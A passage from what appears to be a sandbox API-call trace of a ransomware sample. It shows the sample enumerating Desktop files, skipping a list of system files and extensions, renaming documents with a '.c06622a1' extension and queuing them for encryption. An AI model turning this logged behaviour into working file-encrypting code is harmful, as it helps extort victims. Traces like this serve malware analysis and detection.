_Str2="UB2iD9do9wG9wA7Spg.m4a") returned -12 [0148.545] wcslen (_String="iconcache.db") returned 0xc [0148.545] _wcsicmp (_Str1="ntldr", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -7 [0148.545] wcslen (_String="ntldr") returned 0x5 [0148.545] _wcsicmp (_Str1="ntuser.dat", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -7 [0148.545] wcslen (_String="ntuser.dat") returned 0xa [0148.545] _wcsicmp (_Str1="ntuser.dat.log", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -7 [0148.545] wcslen (_String="ntuser.dat.log") returned 0xe [0148.545] _wcsicmp (_Str1="ntuser.ini", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -7 [0148.545] wcslen (_String="ntuser.ini") returned 0xa [0148.545] _wcsicmp (_Str1="thumbs.db", _Str2="UB2iD9do9wG9wA7Spg.m4a") returned -1 [0148.545] wcslen (_String="thumbs.db") returned 0x9 [0148.545] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0148.545] wcslen (_String="386") returned 0x3 [0148.545] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0148.545] wcslen (_String="adv") returned 0x3 [0148.545] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0148.545] wcslen (_String="ani") returned 0x3 [0148.545] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0148.545] wcslen (_String="bat") returned 0x3 [0148.545] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0148.545] wcslen (_String="bin") returned 0x3 [0148.545] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0148.545] wcslen (_String="cab") returned 0x3 [0148.545] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0148.545] wcslen (_String="cmd") returned 0x3 [0148.546] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0148.546] wcslen (_String="com") returned 0x3 [0148.546] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0148.546] wcslen (_String="cpl") returned 0x3 [0148.546] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0148.546] wcslen (_String="cur") returned 0x3 [0148.546] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0148.546] wcslen (_String="deskthemepack") returned 0xd [0148.546] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0148.546] wcslen (_String="diagcab") returned 0x7 [0148.546] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0148.546] wcslen (_String="diagcfg") returned 0x7 [0148.546] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0148.546] wcslen (_String="diagpkg") returned 0x7 [0148.546] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0148.546] wcslen (_String="dll") returned 0x3 [0148.546] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0148.546] wcslen (_String="drv") returned 0x3 [0148.546] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0148.546] wcslen (_String="exe") returned 0x3 [0148.546] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0148.546] wcslen (_String="hlp") returned 0x3 [0148.546] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0148.546] wcslen (_String="icl") returned 0x3 [0148.546] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0148.546] wcslen (_String="icns") returned 0x4 [0148.546] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0148.546] wcslen (_String="ico") returned 0x3 [0148.546] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0148.547] wcslen (_String="ics") returned 0x3 [0148.547] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0148.547] wcslen (_String="idx") returned 0x3 [0148.547] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0148.547] wcslen (_String="ldf") returned 0x3 [0148.547] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0148.547] wcslen (_String="lnk") returned 0x3 [0148.547] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0148.547] wcslen (_String="mod") returned 0x3 [0148.547] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0148.547] wcslen (_String="mpa") returned 0x3 [0148.547] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0148.547] wcslen (_String="msc") returned 0x3 [0148.547] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0148.547] wcslen (_String="msp") returned 0x3 [0148.547] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0148.547] wcslen (_String="msstyles") returned 0x8 [0148.547] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0148.547] wcslen (_String="msu") returned 0x3 [0148.547] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0148.547] wcslen (_String="nls") returned 0x3 [0148.547] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0148.547] wcslen (_String="nomedia") returned 0x7 [0148.547] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0148.547] wcslen (_String="ocx") returned 0x3 [0148.547] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0148.547] wcslen (_String="prf") returned 0x3 [0148.547] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0148.547] wcslen (_String="ps1") returned 0x3 [0148.548] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0148.548] wcslen (_String="rom") returned 0x3 [0148.548] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0148.548] wcslen (_String="rtp") returned 0x3 [0148.548] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0148.548] wcslen (_String="scr") returned 0x3 [0148.548] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0148.548] wcslen (_String="shs") returned 0x3 [0148.548] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0148.548] wcslen (_String="spl") returned 0x3 [0148.548] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0148.548] wcslen (_String="sys") returned 0x3 [0148.548] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0148.548] wcslen (_String="theme") returned 0x5 [0148.548] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0148.548] wcslen (_String="themepack") returned 0x9 [0148.548] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0148.548] wcslen (_String="wpx") returned 0x3 [0148.548] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0148.548] wcslen (_String="lock") returned 0x4 [0148.548] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0148.548] wcslen (_String="key") returned 0x3 [0148.548] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0148.548] wcslen (_String="hta") returned 0x3 [0148.548] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0148.548] wcslen (_String="msi") returned 0x3 [0148.548] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0148.548] wcslen (_String="pdb") returned 0x3 [0148.549] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0148.549] wcslen (_String="sql") returned 0x3 [0148.549] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0148.549] wcslen (_String="sqlite") returned 0x6 [0148.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.549] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.549] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.549] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.549] wcscpy (in: _Dest=0x44d00cc, _Source="UB2iD9do9wG9wA7Spg.m4a" | out: _Dest="UB2iD9do9wG9wA7Spg.m4a") returned="UB2iD9do9wG9wA7Spg.m4a" [0148.549] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a", dwFileAttributes=0x80) returned 1 [0148.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ub2id9do9wg9wa7spg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x658 [0148.549] SetFilePointerEx (in: hFile=0x658, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.549] ReadFile (in: hFile=0x658, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.550] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xf1c370db [0148.550] RtlComputeCrc32 (PartialCrc=0x70db, Buffer=0x3feb74, Length=0x80) returned 0x4a206539 [0148.550] RtlComputeCrc32 (PartialCrc=0x6539, Buffer=0x3feb74, Length=0x80) returned 0x89ac6b53 [0148.550] RtlComputeCrc32 (PartialCrc=0x6b53, Buffer=0x3feb74, Length=0x80) returned 0xf4ede2c0 [0148.550] RtlComputeCrc32 (PartialCrc=0xe2c0, Buffer=0x3feb74, Length=0x80) returned 0xe70dfbd0 [0148.550] CloseHandle (hObject=0x658) returned 1 [0148.551] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.551] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a" [0148.551] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a") returned 0x40 [0148.551] wcscpy (in: _Dest=0x44e0100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.551] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ub2id9do9wg9wa7spg.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ub2id9do9wg9wa7spg.m4a.c06622a1"), dwFlags=0x8) returned 1 [0148.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UB2iD9do9wG9wA7Spg.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ub2id9do9wg9wa7spg.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x658 [0148.553] CreateIoCompletionPort (FileHandle=0x658, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.553] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5000020 [0148.560] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x513fe31d [0148.560] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x663b138b [0148.560] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ee49aa9 [0148.560] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5bbcd7b0 [0148.560] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f0deabf [0148.560] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55e02290 [0148.560] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x249e45d7 [0148.560] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1e27a2fc [0148.563] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5000094, Length=0x80) returned 0x50155c6b [0148.563] RtlComputeCrc32 (PartialCrc=0x5c6b, Buffer=0x5000094, Length=0x80) returned 0xeda1b548 [0148.563] RtlComputeCrc32 (PartialCrc=0xb548, Buffer=0x5000094, Length=0x80) returned 0x53f23498 [0148.563] RtlComputeCrc32 (PartialCrc=0x3498, Buffer=0x5000094, Length=0x80) returned 0x87586c36 [0148.563] RtlComputeCrc32 (PartialCrc=0x6c36, Buffer=0x5000094, Length=0x80) returned 0x840c3e9b [0148.563] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5000020) returned 1 [0148.563] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.564] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.564] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2ef6160, ftCreationTime.dwHighDateTime=0x1d5da06, ftLastAccessTime.dwLowDateTime=0x46b9bca0, ftLastAccessTime.dwHighDateTime=0x1d5e699, ftLastWriteTime.dwLowDateTime=0x46b9bca0, ftLastWriteTime.dwHighDateTime=0x1d5e699, nFileSizeHigh=0x0, nFileSizeLow=0x238c, dwReserved0=0x0, dwReserved1=0x0, cFileName="VhYsypDPId.doc", cAlternateFileName="VHYSYP~1.DOC")) returned 1 [0148.564] _wcsicmp (_Str1="VhYsypDPId.doc", _Str2="README.c06622a1.TXT") returned 4 [0148.564] wcsstr (_Str="VhYsypDPId.doc", _SubStr="README") returned 0x0 [0148.564] _wcsicmp (_Str1="autorun.inf", _Str2="VhYsypDPId.doc") returned -21 [0148.564] wcslen (_String="autorun.inf") returned 0xb [0148.564] _wcsicmp (_Str1="boot.ini", _Str2="VhYsypDPId.doc") returned -20 [0148.564] wcslen (_String="boot.ini") returned 0x8 [0148.564] _wcsicmp (_Str1="bootfont.bin", _Str2="VhYsypDPId.doc") returned -20 [0148.564] wcslen (_String="bootfont.bin") returned 0xc [0148.564] _wcsicmp (_Str1="bootsect.bak", _Str2="VhYsypDPId.doc") returned -20 [0148.564] wcslen (_String="bootsect.bak") returned 0xc [0148.564] _wcsicmp (_Str1="desktop.ini", _Str2="VhYsypDPId.doc") returned -18 [0148.564] wcslen (_String="desktop.ini") returned 0xb [0148.564] _wcsicmp (_Str1="iconcache.db", _Str2="VhYsypDPId.doc") returned -13 [0148.564] wcslen (_String="iconcache.db") returned 0xc [0148.564] _wcsicmp (_Str1="ntldr", _Str2="VhYsypDPId.doc") returned -8 [0148.564] wcslen (_String="ntldr") returned 0x5 [0148.564] _wcsicmp (_Str1="ntuser.dat", _Str2="VhYsypDPId.doc") returned -8 [0148.564] wcslen (_String="ntuser.dat") returned 0xa [0148.564] _wcsicmp (_Str1="ntuser.dat.log", _Str2="VhYsypDPId.doc") returned -8 [0148.564] wcslen (_String="ntuser.dat.log") returned 0xe [0148.564] _wcsicmp (_Str1="ntuser.ini", _Str2="VhYsypDPId.doc") returned -8 [0148.564] wcslen (_String="ntuser.ini") returned 0xa [0148.564] _wcsicmp (_Str1="thumbs.db", _Str2="VhYsypDPId.doc") returned -2 [0148.564] wcslen (_String="thumbs.db") returned 0x9 [0148.565] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0148.565] wcslen (_String="386") returned 0x3 [0148.565] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0148.565] wcslen (_String="adv") returned 0x3 [0148.565] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0148.565] wcslen (_String="ani") returned 0x3 [0148.565] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0148.565] wcslen (_String="bat") returned 0x3 [0148.565] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0148.565] wcslen (_String="bin") returned 0x3 [0148.565] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0148.565] wcslen (_String="cab") returned 0x3 [0148.565] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0148.565] wcslen (_String="cmd") returned 0x3 [0148.565] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0148.565] wcslen (_String="com") returned 0x3 [0148.565] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0148.565] wcslen (_String="cpl") returned 0x3 [0148.565] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0148.565] wcslen (_String="cur") returned 0x3 [0148.565] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0148.565] wcslen (_String="deskthemepack") returned 0xd [0148.565] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0148.565] wcslen (_String="diagcab") returned 0x7 [0148.565] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0148.565] wcslen (_String="diagcfg") returned 0x7 [0148.565] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0148.565] wcslen (_String="diagpkg") returned 0x7 [0148.566] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0148.566] wcslen (_String="dll") returned 0x3 [0148.566] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0148.566] wcslen (_String="drv") returned 0x3 [0148.566] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0148.566] wcslen (_String="exe") returned 0x3 [0148.566] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0148.566] wcslen (_String="hlp") returned 0x3 [0148.566] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0148.566] wcslen (_String="icl") returned 0x3 [0148.566] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0148.566] wcslen (_String="icns") returned 0x4 [0148.566] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0148.566] wcslen (_String="ico") returned 0x3 [0148.566] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0148.566] wcslen (_String="ics") returned 0x3 [0148.566] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0148.566] wcslen (_String="idx") returned 0x3 [0148.566] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0148.566] wcslen (_String="ldf") returned 0x3 [0148.566] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0148.566] wcslen (_String="lnk") returned 0x3 [0148.566] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0148.566] wcslen (_String="mod") returned 0x3 [0148.566] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0148.566] wcslen (_String="mpa") returned 0x3 [0148.566] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0148.566] wcslen (_String="msc") returned 0x3 [0148.566] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0148.567] wcslen (_String="msp") returned 0x3 [0148.567] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0148.567] wcslen (_String="msstyles") returned 0x8 [0148.567] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0148.567] wcslen (_String="msu") returned 0x3 [0148.567] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0148.567] wcslen (_String="nls") returned 0x3 [0148.567] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0148.567] wcslen (_String="nomedia") returned 0x7 [0148.567] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0148.567] wcslen (_String="ocx") returned 0x3 [0148.567] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0148.567] wcslen (_String="prf") returned 0x3 [0148.567] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0148.567] wcslen (_String="ps1") returned 0x3 [0148.567] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0148.567] wcslen (_String="rom") returned 0x3 [0148.567] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0148.567] wcslen (_String="rtp") returned 0x3 [0148.567] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0148.567] wcslen (_String="scr") returned 0x3 [0148.567] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0148.567] wcslen (_String="shs") returned 0x3 [0148.567] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 [0148.567] wcslen (_String="spl") returned 0x3 [0148.567] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0148.567] wcslen (_String="sys") returned 0x3 [0148.567] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0148.568] wcslen (_String="theme") returned 0x5 [0148.568] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0148.568] wcslen (_String="themepack") returned 0x9 [0148.568] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0148.568] wcslen (_String="wpx") returned 0x3 [0148.568] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0148.568] wcslen (_String="lock") returned 0x4 [0148.568] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0148.568] wcslen (_String="key") returned 0x3 [0148.568] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0148.568] wcslen (_String="hta") returned 0x3 [0148.568] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0148.568] wcslen (_String="msi") returned 0x3 [0148.568] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0148.568] wcslen (_String="pdb") returned 0x3 [0148.568] _wcsicmp (_Str1="sql", _Str2="doc") returned 15 [0148.568] wcslen (_String="sql") returned 0x3 [0148.568] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0148.568] wcslen (_String="sqlite") returned 0x6 [0148.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.568] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.568] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.568] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.568] wcscpy (in: _Dest=0x44d00cc, _Source="VhYsypDPId.doc" | out: _Dest="VhYsypDPId.doc") returned="VhYsypDPId.doc" [0148.569] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc", dwFileAttributes=0x80) returned 1 [0148.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vhysypdpid.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0148.569] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.569] ReadFile (in: hFile=0x368, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.570] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xcae3a2ec [0148.570] RtlComputeCrc32 (PartialCrc=0xa2ec, Buffer=0x3feb74, Length=0x80) returned 0x13a7587c [0148.570] RtlComputeCrc32 (PartialCrc=0x587c, Buffer=0x3feb74, Length=0x80) returned 0x21bdcb62 [0148.570] RtlComputeCrc32 (PartialCrc=0xcb62, Buffer=0x3feb74, Length=0x80) returned 0xae42825f [0148.570] RtlComputeCrc32 (PartialCrc=0x825f, Buffer=0x3feb74, Length=0x80) returned 0xda7bc95e [0148.570] CloseHandle (hObject=0x368) returned 1 [0148.570] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.570] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc" [0148.570] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc") returned 0x38 [0148.570] wcscpy (in: _Dest=0x44e00f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.570] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vhysypdpid.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vhysypdpid.doc.c06622a1"), dwFlags=0x8) returned 1 [0148.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VhYsypDPId.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vhysypdpid.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0148.573] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.573] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x5090020 [0148.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x11317af4 [0148.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x26fad24f [0148.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29588213 [0148.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5649b978 [0148.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xcb8d557 [0148.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66ffcaec [0148.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f0b7927 [0148.579] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7fc65a7d [0148.582] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x5090094, Length=0x80) returned 0x4325b5e [0148.582] RtlComputeCrc32 (PartialCrc=0x5b5e, Buffer=0x5090094, Length=0x80) returned 0xb27e6f94 [0148.582] RtlComputeCrc32 (PartialCrc=0x6f94, Buffer=0x5090094, Length=0x80) returned 0x7d783ea9 [0148.582] RtlComputeCrc32 (PartialCrc=0x3ea9, Buffer=0x5090094, Length=0x80) returned 0x55e5c3d5 [0148.582] RtlComputeCrc32 (PartialCrc=0xc3d5, Buffer=0x5090094, Length=0x80) returned 0xb40fb8fc [0148.582] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5090020) returned 1 [0148.583] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.583] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.583] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb4e160, ftCreationTime.dwHighDateTime=0x1d5e570, ftLastAccessTime.dwLowDateTime=0xa65693e0, ftLastAccessTime.dwHighDateTime=0x1d5dc94, ftLastWriteTime.dwLowDateTime=0xa65693e0, ftLastWriteTime.dwHighDateTime=0x1d5dc94, nFileSizeHigh=0x0, 